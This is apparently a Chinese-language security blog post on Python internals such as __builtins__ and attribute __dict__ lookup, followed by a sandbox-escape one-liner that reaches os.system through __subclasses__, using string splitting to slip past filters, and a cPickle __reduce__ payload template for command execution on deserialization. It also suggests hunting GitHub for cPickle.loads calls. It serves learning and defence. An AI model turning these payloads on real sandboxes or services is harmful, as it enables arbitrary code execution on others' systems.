Python的一些高级特性以及反序列化漏洞

0x01 简述

　　文章主要记录一下python高级特性以及安全相关的问题

python作为脚本语言，其作为高级语言是由c语言开发的，关于python的编译和链接可以看向这里https://github.com/python/cpython（建议自己读读源码，可以更好的理解python的语言特性等。）

python标准库：

python标准库包含内置模块(有c语言实现，主要提供接入系统的基本功能，例如文件的IO)，还有一些python实现的模块提供了类似于其它语言的一些标准解决方案。

python自带了内置库和第三方库的文档查看器：命令行输入：

python –m pydoc –p 8888

查看

内置模块（c语言实现）

 内置模块（python实现）

第三方模块

python一般的package结构图

 

0x02 python的一些特性

1> __builtin__与__builtins__的区别与关系
python有一个内建模块，该模块会在python启动后，但在没有执行python代码前，会被加载到内存.即可用调用里面的函数，其中__builtin__只存在与python2.x中__builtins__在python2.x/3.x都有，是内建模块一个引用，与__builtin__相同的是也会一开始被先于程序加载到内存它们存在如下的区别：

1、在主模块main中，__builtins__是对内建模块__builtin__本身的引用，即__builtins__完全等价于__builtin__，二者完全是一个东西，不分彼此
2、非主模块main中，__builtins__仅是对__builtin__.__dict__的引用，而非__builtin__本身可以参考这篇文章： https://www.jianshu.com/p/645e97383c1f

2> 属性的__dict__

Python中的属性是分层定义的,当我们需要调用某个属性的时候，Python会一层层向上遍历，直到找到那个属性。(某个属性可能出现在不同的层被重复定义，Python向上的过程中，会选取先遇到的那一个，也就是比较低层的属性定义)。

下面用张图展示一下其中的关系

例如下面的代码：

class bird(object):
    feather = True

class chicken(bird):
    fly = False
    def __init__(self, age):
        self.age = age
    def eat(self):
        print("eat")
    class malechicken(object):
        sex = "male"

summer = chicken(2)

print(bird.__dict__)
print(chicken.__dict__)
print(summer.__dict__)

输出：

/Library/Frameworks/Python.framework/Versions/3.5/bin/python3.5 /Users/m0rk/GitHub/Demo/request_debug.py
{'__doc__': None, '__module__': '__main__', '__weakref__': <attribute '__weakref__' of 'bird' objects>, '__dict__': <attribute '__dict__' of 'bird' objects>, 'feather': True}
{'__doc__': None, '__module__': '__main__', 'fly': False, 'malechicken': <class '__main__.chicken.malechicken'>, '__init__': <function chicken.__init__ at 0x1045e8488>, 'eat': <function chicken.eat at 0x1045e8598>}
{'age': 2}

Process finished with exit code 0

 可参考：

http://www.cnblogs.com/vamei/archive/2012/12/11/2772448.html

http://hbprotoss.github.io/posts/python-descriptor.html

0x03 python沙箱绕过

 　　最早的文章见这里https://hexplo.it/escaping-the-csawctf-python-sandbox/

rickgray 修改成更为通用的poc，文章见这里 http://rickgray.me/use-python-features-to-execute-arbitrary-codes-in-jinja2-templates

[x for x in [].__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0].__init__.func_globals['linecache'].__dict__['o'+'s'].__dict__['sy'+'stem']('id')

0x04 反序列化漏洞

 　　同其它语言一样，python也有序列化的功能，官方库里提供了pickle/cPickle的库用于序列化和反序列化，这两个库的作用和使用方法都是一致的，只是一个用纯py实现，另一个用c实现。

python序列化的payload如下：

#!/usr/bin/env python
import cPickle
import os

class exp(object):
    def __reduce__(self):
        ser = """put command here"""
        return (os.system, (ser,))

e = exp()
ser = cPickle.dumps(e)

当有存在漏洞的系统反序列化我们的payload的时候，命令就执行了。

0x05 其它

　　在这篇文章中 Python Pickle反序列化带来的安全问题（http://www.vuln.cn/8094） 作者提到了 请灵活使用google 即在google中搜索 cPickle.loads( site:github.com 既可寻找反序列化在现实中的应用，挺不错的，学习了

0x06 Reference

　　1. https://github.com/bit4woo/python_sec

　　2. Python Pickle反序列化带来的安全问题  http://www.vuln.cn/8094　

　　3.python 正向连接后门 https://www.leavesongs.com/PYTHON/python-shell-backdoor.html